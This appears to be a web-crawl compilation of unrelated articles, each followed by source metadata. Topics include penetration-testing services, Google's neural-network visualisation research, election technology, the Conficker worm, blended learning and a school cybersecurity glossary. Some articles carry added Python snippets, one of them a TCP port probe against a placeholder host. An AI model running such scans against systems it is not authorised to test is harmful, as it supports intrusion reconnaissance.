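To make the automated side of that distinction concrete, here is a minimal sketch of the simplest building block of a scan: probing a few TCP ports on a host you are authorised to test. The target host and port list are placeholders, and real scanners do far more than this.

```python
# Minimal TCP port probe - the simplest building block of an automated scan.
# Only run something like this against systems you are authorised to test.
# The target host and port list below are placeholders.
import socket

TARGET = "scanme.example.internal"
PORTS = [22, 80, 443, 3389, 8080]

def is_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

for port in PORTS:
    state = "open" if is_open(TARGET, port) else "closed or filtered"
    print(f"{TARGET}:{port} {state}")
```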
Web application testing

As web technologies and web applications advance rapidly and become increasingly integral to our daily lives, there's even more exposure to cyber security risks through these web applications. Web application pen testing is the process of identifying vulnerabilities in your company software or website, for example. These vulnerabilities may arise through insecurities in the design, coding and publishing stages of the web application. Web application testing can check for things like:
- Secure user authentication
- Weaknesses in your website code and structure
- Secure configuration of web browsers
- Web server and database server security testing

Mobile application testing

iOS and Android apps can throw up a unique set of security risks compared to desktop apps. For example, the design and implementation of the mobile app itself, plus any APIs it uses, will need to be tested. Protection from data theft by other applications on the device or the device user (think payment information or apps that offer in-app purchases) becomes an issue. Pen testing mobile applications can also discover and exploit security vulnerabilities in your app's functionality or your software development lifecycle, for example.

Automated penetration testing

As hackers become more sophisticated than ever before, it becomes increasingly difficult for you to know where your cyber security vulnerabilities are. At BlueFort we try to mimic hackers' techniques. This involves automated penetration testing, to continuously stress test and validate your cyber security controls. Here at BlueFort, we partner with the recognised market leaders PCYSYS to provide an automated penetration testing solution. You can also watch an example of our live automated penetration testing using PenTera here.

Importance of penetration testing

Easy. Cyber security is essential for your business. You don't want to suffer:
- a loss of business data,
- a leak of sensitive information or
- a lack of customer trust.
And penetration testing is a crucial part of cyber security. Therefore, pen testing is vital for the security of your business IT systems, network, servers, devices and web applications. Let's look at some of the benefits of penetration testing.

Penetration testing benefits

Your IT infrastructure covers your entire network, mobile devices, Virtual Private Networks (VPN), remote access, servers, databases, desktop computers, even networked scanners and printers. Pen testing your infrastructure is an essential step in keeping the security of your employees, company resources and customers fully protected and intact. And as your infrastructure evolves, you need pen testing to ensure new vulnerabilities are dealt with.

Existing cyber security assessment

As your company systems evolve and cyber attacks become ever more sophisticated, you must continually assess your cyber security. A pen test will show how well you're protecting the data and infrastructure specifically targeted by the test.
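As one tiny, concrete example of the web application checks listed above, the sketch below inspects the HTTP security headers a site returns. It uses the third-party requests package against a placeholder URL and only scratches the surface of a real web application test.

```python
# Quick check of common HTTP security headers - one small slice of what a web
# application test covers. The URL is a placeholder; test only sites you own
# or are authorised to assess. Requires the `requests` package.
import requests

EXPECTED_HEADERS = [
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Content-Type-Options",
    "X-Frame-Options",
]

response = requests.get("https://www.example.com", timeout=10)
for header in EXPECTED_HEADERS:
    value = response.headers.get(header)
    print(f"{header}: {value if value else 'MISSING'}")
```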
Various regulations and standards have components specifically related to system auditing and security. Here are some examples:

- PCI DSS (Payment Card Industry Data Security Standard)
  - Set up to help businesses process card payments securely.
  - It states regular penetration testing is required to identify security issues.
- ISO 27001
  - Performing a penetration test is an essential part of ISO 27001 compliance.
  - ISO 27001 says that "Information about technical vulnerabilities of information systems being used shall be obtained in a timely fashion, the organisation's exposure to such vulnerabilities evaluated and appropriate measures taken to address the associated risk."
- GDPR (General Data Protection Regulation)
  - This is the data privacy and security law that provides greater protection and rights to EU individuals and their personal data.
  - It states there should be a "…process for regular testing, assessing and evaluating the effectiveness of technical and organisational measures for ensuring the security of the processing".

Cyber security risk assessment

Pen testing will detect, discover and assess security risks before they are exploited by an attacker. For example, insecure data storage might contravene GDPR as described above, so pen testing can be used to pick up these crucial weak spots.

Identify security enhancements

Pen testing is vital for ensuring your IT systems and digital assets are tested for any security flaws. BlueFort's penetration test services are carried out by experienced, expert security consultants. They'll assess the vulnerabilities and provide comprehensive advice to improve your security.

Mobile app data leakage identification

Pen testing can identify where mobile apps make user data vulnerable to access from other apps or hackers. As mobile apps often handle sensitive information or are a gateway to your backend system, they are perfect targets. Therefore, mobile app security is vital – from their development processes to deployment.

Authorisation and authentication issues revealed

The three-step security process of identifying, authenticating and authorising ensures that individuals accessing corporate data and systems are who they say they are. But are there weaknesses in your system? Have out-of-the-box default settings been left in place? There's an issue right there. Pen testing, of course, can target and pick up authorisation and authentication issues in your network perimeter and internal systems too.

When to conduct penetration testing

So, the big question. When should you pen test and how often? Well, it's not a one-off task. Many factors can influence your pen testing schedule, including budget size and availability. Generally, pen testing is typically used:
- Before an application or system is deployed.
- When a system has stabilised and isn't being constantly changed or updated.
- Before apps and systems are used in mission-critical applications.
How often you carry out pen testing depends on a few factors, such as:
- Company size. Bigger companies may be seen as more attractive to hackers.
- Budget. Pen tests can be expensive. Therefore, a small budget might mean you pen test once every couple of years.
- Regulations and compliance. Depending on your industry, you may be required to perform testing to meet certain regulations.
- Infrastructure. If all your infrastructure is essentially in the cloud, your provider may already conduct pen tests internally.
Remember, you can watch an example of BlueFort's live automated penetration testing here. By now you will have got the message – penetration testing is vitally important for businesses. You need a company that has years of experience and real expertise in conducting effective penetration testing. It can be a bit of a minefield.
Source: https://www.bluefort.com/news/latest-blogs/why-penetration-testing-is-important/ (Common Crawl, CC-MAIN-2022-40)
Google researchers last month reported progress in advancing the image classification and speech recognition capabilities of artificial neural networks. Image classification and speech recognition tools are based on well-known mathematical methods, but why certain models work while others don't has been hazy, noted software engineers Alexander Mordvintsev and Mike Tyka, and software engineering intern Christopher Olah, in a blog post. To help unravel the mystery, the team trained an artificial neural network by showing it millions of images — "training examples" — and gradually adjusting the parameters until the network was able to provide the desired classifications. They applied the process, dubbed "inceptionism," to 10 to 30 stacked layers of artificial neurons. The team fed the network an image, which was processed layer by layer until the output layer was reached. The final layer provided the network's answer. The software was able to build up an idea of what it thought the object should look like. The results, in a word, were surprising. Instead of producing something resembling actual objects, the network added components and refined the images in ways that often resembled modern art.

Creative and Original Thought

The research was important because it enabled training of the network, the Google team noted. In some cases, it allowed the researchers to understand that what the neural net was looking for was not the thing they expected. Moreover, the team discovered that each layer dealt with features at a different level of abstraction, which often resulted in complexity, depending on which layers were enhanced. The inceptionism techniques could help researchers understand and even visualize how neural networks are able to carry out various classification tasks. A better understanding of how the network learns through the training process could lead to improvements in network architecture. "This is about creativity; coming up with something new from complete randomness," said Roger Entner, principal analyst at Recon Analytics. "This is how we are able to give the computer's AI a new idea," he told TechNewsWorld. "We basically begin with something almost random and impose our order on it — and through this it is able to create something new," Entner explained. "In this way, it is about original thought — creativity and original thought."

Not So Abstract

One unforeseen benefit of the study could be the development of a new tool for artists to remix visual concepts, the researchers suggested. The result could be interesting — perhaps disturbing — abstract images, but the potential doesn't end there. "This is about how we use databases to teach computers to learn," said Jim McGregor, founder and principal analyst at Tirias Research. "Right now, deep learning is still in its research phase; this is about perfecting the algorithms," he told TechNewsWorld. Once it's perfected, the applications could be unlimited, McGregor added. "Medical is one, where the computer can consider the CT, MRI or X-ray and determine what the image might reveal," he suggested. "Security applications are also possible," McGregor said. "It could be used in autonomous vehicles where the AI can take all the data that is being presented and develop algorithms that make self-driving cars possible," he continued. "It is really about teaching intelligent algorithms for almost anything."

AI to the Next Level

Visual recognition is just one area of interest. This line of AI research could converge with other advanced computer technologies.
"This goes hand in hand with the Internet of Things," said McGregor. "It is more than just connecting everything through the cloud — it's building the intelligence into devices around us," he explained. "This is really just a part of all these things that appear to be independent but are in fact very connected." Any fears that this could end badly for humanity — as in machines that rise up against their human masters — are probably just science fiction. "Hollywood may make a lot of money on movies about machines wanting to kill us, but that involves so much more, including advanced robotics," McGregor explained. "We're not even close to that and likely never will be," he added. "Right now, we're just at the point where we're teaching computers to do things better. It was Alan Turing who suggested that it isn't that machines can't learn — they just learn differently."
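For readers who want a concrete feel for the technique described above, here is a minimal, hedged sketch of the underlying idea in PyTorch: nudge an input image by gradient ascent so it more strongly activates a chosen layer, then look at what emerges. The model, layer choice, and hyperparameters are illustrative assumptions, and Google's actual DeepDream code differs in many details.

```python
# Hedged sketch of the core "inceptionism" idea: adjust the input image so a
# chosen layer's activations grow, then look at what the network "wants" to
# see. Model, layer index, and hyperparameters are illustrative choices only.
import torch
from torchvision import models

model = models.vgg16(weights=models.VGG16_Weights.DEFAULT).eval()
layer = model.features[:17]          # activations up to a mid-level conv block

image = torch.rand(1, 3, 224, 224, requires_grad=True)  # start from noise

optimizer = torch.optim.Adam([image], lr=0.05)
for step in range(200):
    optimizer.zero_grad()
    activation = layer(image)
    loss = -activation.norm()        # gradient ascent on activation strength
    loss.backward()
    optimizer.step()
    with torch.no_grad():
        image.clamp_(0.0, 1.0)       # keep pixel values in a displayable range

# `image` now exaggerates whatever patterns that layer responds to, giving the
# dream-like textures the researchers described.
result = image.detach().squeeze(0)
print(result.shape)  # torch.Size([3, 224, 224])
```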
Source: https://www.crmbuyer.com/story/artificial-intelligence-dreamtime-82199.html (Common Crawl, CC-MAIN-2022-40)
A week — even a day — can make a world of difference in a presidential election. Witness the fact that nearly right up to the minute the still-unfolding Wall Street crisis came to a boil, the issue getting the most play in campaign speeches was oil prices. There was even a fair amount of speculation that one of John McCain’s primary motives for placing Sarah Palin second on his ticket was her geographic proximity to the Alaskan oil fields and her support of the effort to allow further exploration of them. Despite the fact that the issue du jour has shifted, however, technology — and its impact on a host of hot-button topics — has kept its front-and-center position in many discussions of presidential politics, the candidates and America’s future. For starters, it’s worth noting that one of the most important technology matters in November likely will be the election process itself. The last two presidential elections, in 2000 and 2004, were two of the closest in American history. Not surprisingly, this fact alone has generated intense interest in how votes are collected, tallied and recorded. In the aftermath of those elections, state governments have come under intense pressure to streamline voting operations, and they are looking to technology both to improve accuracy and lower the costs of running elections. Along with the advent of computerized voting, however, have come questions about exactly how software-based elections can be monitored and verified. Many groups advocate establishing a paper trail, whereby individual votes can be legitimized in hard copy. Barack Obama favors ballot receipts verified by individual voters; he cosponsored the “Ballot Integrity Act of 2007.” John McCain has not made a clear statement on the particulars of election process reform. Still, public discourse on whether polling places should use optical scanners, touch-screen systems, or other computer technology to gather and count votes largely misses the central point, according to Thad Hall, assistant professor of political science at the University of Utah. “Elections are an administrative activity,” Hall told TechNewsWorld. “We keep focusing on the shiny toys instead of procedures.” It is the procedures themselves — like keeping a careful chain of custody of ballots and voting machines of whatever kind — that make the difference between a well-run election and a botched one. Because presidential elections draw voters who may not vote during the intervening four years, it is likely there will be problems in various locations across the country this November, Hall predicted. Exactly where those problems occur, though, could be crucial to election outcomes. “In Hawaii, they could lose a bunch of Obama ballots and it wouldn’t make any difference,” he quipped. That’s because states with a clear blue or red leaning will remain so, despite any implementation issues with voting technology. “If you’re an election official in any battleground state — Florida, Ohio, or New Mexico, for example — and you screw up, it’s going to be a big deal,” said Hall. Consequences of a technology glitch in states where the race for electoral votes may come down to thousands, or just hundreds, of ballots could include legal action by one or both campaigns and, more damaging, long-term loss of voter confidence in the election process itself. Any information technology professional will be familiar with the advice Hall has for officials looking to avoid technology-related problems in November. 
“The key is to think through the procedures and training,” he noted. “If IBM was implementing a computer system for a company, they would never turn to the company and say, ‘This system is going to fix everything for you, and don’t worry about the training or procedures part, like the security of your data.'” The mechanics of the election aside, among the more prominent technology-related issues included in stump speeches is how the U.S. will continue to feed its voracious energy appetite. Offshore drilling may be getting the most attention, but alternative energy sources feature prominently in both presidential candidates’ plans for addressing the rising cost of oil. However, irrespective of Congress’ loosening of restraints on offshore oil drilling, “new oil reserves will be slow in coming,” Don Challman, associate director and general manager of the University of Kentucky’s Center for Applied Energy Research, told TechNewsWorld. The future of energy use in the transportation arena, he asserted, will be much more contingent on making more efficient vehicles than on tapping new sources of oil. Making those vehicles a reality remains an issue on which the federal government largely has dropped the ball, through both Democratic and Republican administrations, stressed Challman. “In my 30 years in the field,” he noted, “federal funds for this kind of research have been declining.” By contrast, research on alternative energy technologies is exactly the kind of field in which the federal government should be playing a major role, he argued. “This kind of research is high risk and very expensive,” explained Challman. “It needs leaders to get going, and then, eventually, it will be commercialized. It’s basic and applied research that will get these new kinds of vehicles going — then industry will do the ‘D’ part of R&D.” In fact, the federal government funds a big percentage of all kinds of basic research in the United States. Another field of research getting political attention this election season is the use of embryonic stem cells. John McCain has changed his position on the topic of federal funding of scientific research using stem cells, according to the nonpartisan, nonprofit Web site ProCon.org. As recently as May of 2007 in a Republican presidential debate in Simi Valley, Calif., McCain expressed support for grant projects involving stem cells and their potential use in treating serious illnesses such as diabetes and Parkinson’s disease. Since then, however, he has formally opposed the use of federal funds for research involving stem cells, according to the document, Human Dignity & the Sanctity of Life,” on his official campaign Web site. Barack Obama, on the other hand, is a long-time supporter of research utilizing stem cells and related technologies. He cosponsored the “Stem Cell Research Enhancement Act of 2007.” Both candidates have pointed out that the stem cell lines that are the subject of the research funding debate already exist and would be destroyed if research programs were discontinued. While the implications of the federal government’s attitude toward medical research using stem cells may not be grabbing headlines this week, it remains an important issue to voters. In fact, it was the most popular technology-related search term at the ProCon.org Web site during the period from July 1 through this week, site managing editor Kamy Akhavan told TechNewsWorld. 
Overall, though, the subject ranked 25th in popularity among the 65 issues tracked by the site, indicating that perhaps voters are not as focused on this controversy as they were even six months ago.
<urn:uuid:9213c8cd-d070-47f6-adea-52e6d91e7170>
CC-MAIN-2022-40
https://www.crmbuyer.com/story/while-wall-street-burns-candidates-views-on-tech-issues-simmer-64614.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00020.warc.gz
en
0.960636
1,475
2.609375
3
By definition, Cybersecurity means measures taken to protect computers, servers, mobile devices, electronic systems, networks, and data against unauthorized access, theft, or malicious attacks. Trying to keep up with the latest technology advances can be mind-numbing, and knowing which ones are right for your business is an even greater challenge. Whichever technology solutions you choose, they will need to be integrated with various online platforms including email servers, applications, mobile devices, Cloud-based software, customer portals, and more. If just one of those entry points is vulnerable, they all are.
The Dark Web — a virtual marketplace for cyber crime — is a place where modern criminal activities originate, and it’s also where stolen consumer data is bought and sold. The reason why keeping systems secure is so difficult is because of an underground network of criminals who conduct their “business” on the Dark Web. Online activities are encrypted, making it difficult to discover hackers’ identities and stop their efforts.
Why do hackers want to breach your systems? For some, it’s the money they can make selling your intellectual property or customer data on the Dark Web. Sometimes these criminals can lurk inside your networks undetected and retrieve your data without you ever knowing. Others want to disrupt your operations and hold your systems hostage in exchange for ransom. And then there are those who simply want the satisfaction of knowing they can infiltrate systems to wreak havoc. No matter the intent, the threats are real.
Learn everything you ever wanted to know about the various types of cyberattacks by checking out the following resources and articles.
The first computer virus named “Creeper” was discovered on an experimental computer network that predated the internet.
The first “computer worm” infected computers running UNIX. Due to a miscalculation by the creator of this worm, it spread across the internet, gaining major media attention.
Aggressive viruses infected millions of PCs, crippling email systems worldwide. Cyberattacks became a major concern, prompting the rise of antivirus software.
Starting in 2000, a 15-year-old boy, known as “Mafiaboy,” launched an attack on commercial websites, causing more than $1 billion in damage. Victims included Amazon, CNN, eBay and Yahoo!
The number of data breaches continues to compound. Notable recent attacks include Equifax, Target, Sony, Adobe, and others. Credit card hacks, malicious ransomware, stealing of personal identifying information, and more have been the motivations.
Many organizations go to extraordinary lengths to protect their businesses from various disruptions and downtime — everything from reducing employee turnover to preventing property damage and upgrading equipment. According to many experts, however, cyberattacks are the #1 threat to global organizations, yet many don’t implement adequate measures to mitigate the risks. Check out the following resources to get a better sense of what you may be up against.
There’s no silver bullet for preventing cyberattacks. As technology evolves and advances, so do the tactics of hackers. There are myriad ways to infiltrate systems, and a multi-faceted approach needs to be taken to mitigate the risks and stay on top of the latest threats.
Even though emphasis is placed on thwarting cyber criminals through technology-based solutions, the best way to protect an organization’s data and systems is to educate employees. Human beings are the most common security flaw. Provide the greatest protection for your systems by ensuring your employees don’t mistakenly open the door to hackers. In addition to educating employees, there are steps your business can take to mitigate the risks of a cyberattack. Whether arming your systems with the latest firewalls or preventing unauthorized applications, use these resources to help keep your networks secure. It’s easy to focus on computers, servers, and software when it comes to cybersecurity. However, there are other potential entry points in the average business that are often overlooked. Unfortunately, there is no guarantee against cyberattacks. As shown in recent, high-profile attacks, even the most aggressive security measures and sophisticated software can be susceptible. Preventative efforts are critical, but so are the strategies for responding should a successful cyberattack occur. The potential for cyber incidents will only continue to climb as technology advances. By implementing the strategies outlined here, combined with the help of Managed IT professionals, you can stay one step ahead of cyber criminals. Start taking preventative measures today by requesting a complimentary risk assessment of your existing IT environment. Just complete the following form.
<urn:uuid:92a71dca-864d-48f4-9587-9a75c6b9c1ca>
CC-MAIN-2022-40
https://www.gflesch.com/elevity/cybersecurity-for-business
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337504.21/warc/CC-MAIN-20221004121345-20221004151345-00020.warc.gz
en
0.936137
964
2.625
3
It’s been over seven years since the Conficker worm spread around the world, cracking passwords, exploiting vulnerabilities, and hijacking Windows computers into a botnet to distribute spam and install scareware. It became one of the most serious malware outbreaks of all time. Microsoft even offered a $250,000 reward for anyone offering information that would lead to Conficker’s creator. As far as I’m aware, that bounty has never been paid and the malware authors remain at large. So, you may be wondering, what of Conficker today? Well, according to the latest statistics provided by Check Point, Conficker remains the top malware attacking its UK corporate customers – accounting for some 1 in 5 of all detections. As The Register reports, Conficker may not be causing as many problems as it did seven years ago – but plenty of computers remain infected, allowing the worm to continue to try to find other Windows systems to infect. The Conficker Working Group, which tracks the number of unique IP addresses on the internet that are infected with Conficker, estimates that over 600,000 unique IP addresses remain infected by the malware. As long as there are Conficker-infected computers connected to each other, the malware will continue to hunt for new victims. Most of the malware we see today doesn’t spread via its own steam like the Conficker worm. Instead malicious hackers write Trojan horses that are designed to not draw attention to themselves, and are sometimes sent only to a small list of targets to improve their chances of infecting systems undetected and give attackers access to your files and communications. Every good anti-virus program (in fact, most of the really crummy ones as well) can detect Conficker. The problem is that the computers infected with Conficker attempting to infect other Windows PCs aren’t running anti-virus software. Ironically, Conficker should never have been capable of spreading in the first place – as Microsoft issued a patch for the vulnerability that Conficker relied upon a full 29 days before Conficker began to spread. Be a responsible part of the internet community. Make sure that all of the computers under your control are strongly defended against malware attacks with security software and patches. Don’t allow one computer in the corner of the room to be the one that continues to spread malware that has no right to carry on living. Found this article interesting? Follow Graham Cluley on Twitter to read more of the exclusive content we post.
<urn:uuid:92318d4d-fcfb-47b6-a839-1bfaef50f9ad>
CC-MAIN-2022-40
https://grahamcluley.com/seven-years-conficker-worm-dead-dominating/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00020.warc.gz
en
0.944157
515
2.5625
3
During the worldwide COVID-19 pandemic, it became clear that there is a digital divide and not all students have the same access to educational technology. Some students may rely on the computers and internet access that is provided in an on-campus setting and may not have the same type of technology available to them at home. This can be due to financial reasons or simply because they live somewhere where internet access is not as strong. While it can be difficult to overcome these challenges, higher education organizations can support students by checking that the majority of students have access to the technology they need. With the financial savings made through blended learning, providing some students with computers on loan or ensuring they have a means of getting online could be a possibility for universities. Lack of contact When it comes to working away from campus rather than in a traditional classroom setting, the issue of isolation can become prominent. Students can become increasingly lonely with a lack of direct contact which can cause an increase in mental health issues and a disconnect from peers and tutors. This makes it vital for organizations to offer resources for mental health support and to ensure that students can connect in a structured way, such as in an online classroom, as well as encouraging social events where possible. Quality of education One complaint about the move to online learning has been about the quality of education. Students feel that they are not getting the same benefits from their classes as they would in person and are concerned that it will have a negative impact on their course. To combat this, organizations should diversify their learning model to help with student engagement. Help and support When staff are on-site in a higher education setting, they are accessible to students, with office hours that allow them to provide help and support. However, with an online learning or blended learning approach, this can become more difficult. Students may struggle to get in touch with staff or know how to reach out for support when they’re not on campus or in lectures. It is vital that faculty members make it clear how students can get in touch with them by providing them with virtual office hours, either for individuals to reach out or for group meetups. This should also be available when it comes to academic support staff. The main challenge of blended learning for students is that they are required to have a great amount of self-discipline to carry out their education remotely. Students must be given the tools to succeed in this, while staff also check in with them periodically to ensure that they are staying on track and are not becoming bored or complacent about their education.
<urn:uuid:e351a1b1-f7a4-4db0-a48c-c05171afe195>
CC-MAIN-2022-40
https://www.appsanywhere.com/resource-centre/online-or-distance-learning/blended-learning-challenges
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334515.14/warc/CC-MAIN-20220925070216-20220925100216-00220.warc.gz
en
0.975726
528
2.8125
3
Cybersecurity Terminology Guide for Schools Cybersecurity Terminology Guide for Schools Download your free copy now All too often in the field, our team has noticed organizations using different terminology to talk about the same concepts. This is especially common in schools where shareholders and clients become parents and teachers, and remote work is known as hybrid learning. As part of our mission to fix the broken cybersecurity industry and get everyone speaking the same language, we’ve created a glossary of cybersecurity terminology used in the education field, and broken down how it varies from the way we discuss security in other settings. Please feel free to distribute our free downloadable glossary as a way to help everyone on the same page. Users/titles in K-12 Students, teachers, staff, instructors, administration, school board, superintendent, principal, vice-principal. CIO, CTO, IT Leader, IT Director, assistant/associate superintendents. The federal education records law is a primary compliance focus. The Family Educational Rights and Privacy Act (FERPA) is a federal law enacted in 1974 that protects the privacy of student education records. FERPA applies to any public or private elementary, secondary, or post-secondary school and any state or local education agency that receives funds under an applicable program of the US Department of Education. The Health Insurance Portability and Accountability Act of 1996 (HIPAA) is a federal law that required the creation of national standards to protect sensitive patient health information from being disclosed without the patient’s consent or knowledge. The US Department of Health and Human Services (HHS) issued the HIPAA Privacy Rule to implement the requirements of HIPAA. The HIPAA Security Rule protects a subset of information covered by the Privacy Rule. COPPA imposes certain requirements on operators of websites or online services directed to children under 13 years of age, and on operators of other websites or online services that have actual knowledge that they are collecting personal information online from a child under 13 years of age. State-Level Privacy Acts Although there is not yet a comprehensive federal law that governs data privacy in the United States, several states have passed their own privacy laws and regulations to address growing security concerns. Some notable instances of this are the California Consumer Privacy Act (CCPA) and the Stop Hacks and Improve Electronic Data Security Act (NY SHIELD Act). These privacy laws vary based on region, and while they can be confusing to navigate, they are important to understand. Osano.com keeps an up to date list of state-level privacy acts that is adjusted when new laws are passed, or existing laws are changed. Training = Professional development Fiscal year = School year (in US Education, that’s July 1-June 30) Parts = Semester, quarter, etc. Business/organization = District, or other agency (COE, BOCES, ESAs, DOEs, etc.) Breach = Digital intrusion Distributed/remote workforce = Hybrid/remote learning Customers/clients, stakeholders = Parents/students Common Term Definitions Verifying the identity of a user, process, or device, often as a prerequisite to allowing access to resources in a system. Ensuring timely and reliable access to and use of information. Preserving authorized restrictions on information access and disclosure, including means for protecting personal privacy and proprietary information. 
The set of parameters that can be changed in hardware, software, or firmware that affect the security posture and /or functionality of the system. A system or component of a system that is outside of the authorization boundary established by the organization and for which the organization typically has no direct control over the application of required security controls or the assessment of security control effectiveness. External system service A system service that is implemented outside of the authorization boundary of the organizational system (i.e., a service that is used by, but not part of, the organizational system) and for which the organization typically has no direct control over the application of required security controls or the assessment of security control effectiveness. External system service provider A provider of external system services to an organization through a variety of consumer-producer relationships including but not limited to: joint ventures; business partnerships; outsourcing arrangements (i.e., through contracts, interagency agreements, lines of business arrangements (; licensing agreements; and/or supply chain exchanges. A network not controlled by the organization. An occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of a system or the information the system processes, transmits or stores or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies. The protection of information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide confidentiality, integrity, and availability. Any equipment or interconnected system or subsystem of equipment that is used in the automatic acquisition, storage, manipulation, management, movement, control, display, switching, interchange, transmission, or reception of data or information by the executive agency. For the purposes of the preceding sentence, equipment is used by an executive agency if the equipment is used by the executive agency directly or is used by a contractor under a contract with the executive agency which: (i) requires the use of such equipment; or (ii) requires the use, to a significant extent, of such equipment in the performance of a service or the furnishings of a product. The term information technology includes computers, ancillary equipment, software, firmware, similar procedures, services (including support services), and related resources. Guarding against improper information modification or destruction, and includes ensuring information non-repudiation and authenticity. A network where establishment, maintenance, and provisioning of security controls are under the direct control of organizational employees or contractors; or the cryptographic encapsulation or similar security technology implemented between organization-controlled endpoints, provides the same effect (with regard to confidentiality and integrity). An internal network is typically organization-owned yet may be organization-controlled while not being organization-owned. The principle that a security architecture should be designed so that each entity is granted the minimum system resources and authorizations that the entity needs to perform its function. 
Physical devices or writing surfaces including but not limited to, magnetic tapes, optical disks, magnetic disks, Large-Scale Integration (LSI) memory chips, and printouts (but not including display media) onto which information is recorded, stored, or printed within a system. Authentication using two or more different factors to achieve authentication. Factors include something you know (e.g., PIN number, password); something you have (e.g., device, token, cryptographic identification device); or something you are (e.g., biometric). A system implemented with a collection of interconnected components. Such components may include routers, hubs, cabling, telecommunications controllers, key distribution centers, and technical control devices. A system account with authorizations of a privileged user A user that is authorized (and therefore, trusted) to perform security-relevant functions that ordinary users are not authorized to perform. Access to an organizational system by a user (or a process acting on behalf of a user) communicating through an external network (e.g., the Internet) A measure of the extent to which an entity is threatened by a potential circumstance or event, and typically a function of (i) the adverse impacts that would arise if the circumstance or event occurs; and (ii) the likelihood of occurrence. System-related security risks are those risks that arise from the loss of confidentiality, integrity, or availability of information systems. Such risks reflect the potential adverse impacts to organizational operations, organizational assets, individuals, other organizations, and the nation. The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of a system. Part of risk management, risk assessment incorporates threat and vulnerability analyses and considers mitigations provided by security controls planned or in place. Synonymous with risk analysis. Actions taken to render data written on media unrecoverable by both ordinary and, for some forms of sanitization, extraordinary means. The process to remove information from media such that data recovery is not possible. It includes removing all classified labels, markings, and activity logs. A safeguard or countermeasures prescribed for a system or an organization designed to protect the confidentiality, integrity, and availability of its information and to meet a set of defined security requirements. Security control assessment The testing or evaluation of security controls to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for a system or organization. A discrete, identifiable information technology asset (hardware, software, firmware) that represents a building block of a system. System components include commercial information technology products. Individual, or (system) process acting on behalf of an individual, authorized to access a system.
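Some of the terms defined above, such as multifactor authentication, are easier to picture with a small example. The sketch below is purely illustrative: it assumes the third-party pyotp library is available, and the secret and codes are generated on the spot for demonstration rather than tied to any real account.

```python
# Illustrative sketch of the "something you have" factor in multifactor
# authentication, using a time-based one-time password (TOTP).
# Assumes the third-party pyotp library is installed (pip install pyotp).
import pyotp

# In a real deployment the secret would be generated once per user,
# stored server-side, and provisioned to the user's authenticator app.
secret = pyotp.random_base32()
totp = pyotp.TOTP(secret)

# The authenticator app and the server both derive the same short-lived
# code from the shared secret and the current time window.
current_code = totp.now()
print("Current one-time code:", current_code)

# The first factor (e.g., a password) is checked elsewhere; this only
# demonstrates verifying the second factor.
print("Code accepted:", totp.verify(current_code))
```

Pairing a code like this with a password is what the glossary entry means by "two or more different factors."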
<urn:uuid:d6249a9d-cb85-41b3-94fb-b49b70b6e981>
CC-MAIN-2022-40
https://frsecure.com/cybersecurity-terminology-guide-for-schools/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00220.warc.gz
en
0.913279
1,960
2.890625
3
Content Management Interoperability Services (CMIS)
An open standard for controlling content and document management systems and repositories using web protocols. In the early 2000s, there was a boom in content management systems for publishing data online, including applications like WordPress, Joomla, Drupal, and many more. This Cambrian explosion of content management systems meant that if you wanted to move between content providers without losing data, all systems needed to follow a specific standard. CMIS was initially developed through AIIM and is now maintained as an OASIS standard, to help make sure that content published online can be ported freely. In other words: zip codes for the internet.
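As a rough illustration of what "controlling content repositories using web protocols" looks like in practice, the sketch below queries a repository over the CMIS 1.1 Browser Binding (plain HTTP and JSON). The endpoint URL and credentials are hypothetical placeholders, the exact service URL and response layout vary by vendor, and this is a sketch under those assumptions rather than a reference client.

```python
# Minimal sketch of talking to a CMIS repository over the CMIS 1.1
# Browser Binding. The URL and credentials below are hypothetical.
import requests

CMIS_URL = "https://cms.example.com/cmis/browser"   # placeholder endpoint
AUTH = ("alice", "s3cret")                          # placeholder credentials

# Ask the service to describe the repositories it exposes.
info = requests.get(CMIS_URL, params={"cmisselector": "repositoryInfo"},
                    auth=AUTH, timeout=10).json()
print(info)

# List the children of the root folder of the first repository returned.
# The exact JSON shape can differ between products; adjust as needed.
repo_id = next(iter(info))
root_url = f"{CMIS_URL}/{repo_id}/root"
children = requests.get(root_url, params={"cmisselector": "children"},
                        auth=AUTH, timeout=10).json()
for child in children.get("objects", []):
    props = child["object"]["properties"]
    print(props["cmis:name"]["value"], "-", props["cmis:objectTypeId"]["value"])
```

The point is the portability: the same small client can, in principle, be pointed at any repository that implements the standard.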
<urn:uuid:b5f33866-1796-43ba-ab28-867dadb1cb74>
CC-MAIN-2022-40
https://www.intricately.com/glossary/content-management-interoperability-services-cmis
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00220.warc.gz
en
0.908836
132
2.578125
3
